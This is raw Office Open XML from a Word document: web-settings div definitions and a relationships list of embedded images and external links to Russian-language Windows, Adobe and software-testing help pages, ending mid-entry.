            <w:div w:id="1142425623">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1263995036">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1280332006">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1442720832">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1567375517">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1721902733">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
          </w:divsChild>
        </w:div>
        <w:div w:id="1759135321">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="1808039023">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="1818523298">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="1845171457">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="1857765131">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="1896310311">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="1917591265">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="1922787502">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="1925190319">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="1952779571">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="1953895516">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="1971085850">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="2004047458">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="2009164501">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="2036998958">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="2048405776">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="2053456822">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="2083016153">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="2093040031">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="2101094650">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="2144076870">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="2144957122">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="1928999041">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1932619636">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1939363218">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1957447484">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1972710728">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1979843786">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1988853715">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2027364513">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2042825819">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2061205312">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2070304836">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2070569687">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2073384652">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1776636148">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="129991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75466">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2097238635">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2098482065">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2106799784">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2123912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gif"/><Relationship Id="rId299" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image178.jpeg"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image3.jpeg"/><Relationship Id="rId63" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image40.jpeg"/><Relationship Id="rId159" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.white-windows.ru/wp-content/uploads/2015/07/img_2091.jpg" TargetMode="External"/><Relationship Id="rId324" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image203.jpeg"/><Relationship Id="rId366" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image241.png"/><Relationship Id="rId170" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image112.jpeg"/><Relationship Id="rId226" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image139.jpeg"/><Relationship Id="rId433" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image281.png"/><Relationship Id="rId268" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image160.png"/><Relationship Id="rId475" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image319.png"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image14.jpeg"/><Relationship Id="rId74" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://helpx.adobe.com/ru/x-productkb/global/disable-windows-aero-windows-7.html" TargetMode="External"/><Relationship Id="rId128" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image86.jpeg"/><Relationship Id="rId335" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://get.adobe.com/ru/reader/" TargetMode="External"/><Relationship Id="rId377" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.intuit.ru/department/se/testing/9/testing_9.html" TargetMode="External"/><Relationship Id="rId500" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image344.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/webSettings" Target="webSettings.xml"/><Relationship Id="rId181" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="javascript:void(0);" TargetMode="External"/><Relationship Id="rId237" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://vistablog.com.ua/Windows/view_windows.php?id=101" TargetMode="External"/><Relationship Id="rId402" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image259.jpeg"/><Relationship Id="rId279" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://kompkimi.ru/?attachment_id=28080" TargetMode="External"/><Relationship Id="rId444" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image288.jpeg"/><Relationship Id="rId486" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image330.jpeg"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image25.jpeg"/><Relationship Id="rId139" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.white-windows.ru/wp-content/uploads/2015/07/img_2080.jpg" TargetMode="External"/><Relationship Id="rId290" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://kompkimi.ru/?p=28098" TargetMode="External"/><Relationship Id="rId304" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image183.jpeg"/><Relationship Id="rId346" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image224.jpeg"/><Relationship Id="rId388" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="http://www.intuit.ru/department/se/testing/9/9_3.gif" TargetMode="External"/><Relationship Id="rId511" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="theme/theme1.xml"/><Relationship Id="rId85" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image46.gif"/><Relationship Id="rId150" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image97.jpeg"/><Relationship Id="rId192" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://wininfo.org.ua/uploads/posts/2011-11/1320530429_upr8.jp" TargetMode="External"/><Relationship Id="rId206" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image123.jpeg"/><Relationship Id="rId413" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image269.jpeg"/><Relationship Id="rId248" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://vistablog.com.ua/Windows/view_windows.php?id=102" TargetMode="External"/><Relationship Id="rId455" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image299.png"/><Relationship Id="rId497" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image341.jpeg"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://go.microsoft.com/fwlink/?LinkId=74194" TargetMode="External"/><Relationship Id="rId108" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image68.gif"/><Relationship Id="rId315" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image194.jpeg"/><Relationship Id="rId357" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image232.png"/><Relationship Id="rId54" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.adobe.com/ru/products/premiere-elements/tech-specs.html" TargetMode="External"/><Relationship Id="rId96" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image57.gif"/><Relationship Id="rId161" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image103.jpeg"/><Relationship Id="rId217" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://kompkimi.ru/wp-content/uploads/2015/06/maxresdefault1.jpg" TargetMode="External"/><Relationship Id="rId399" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image256.jpeg"/><Relationship Id="rId259" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" 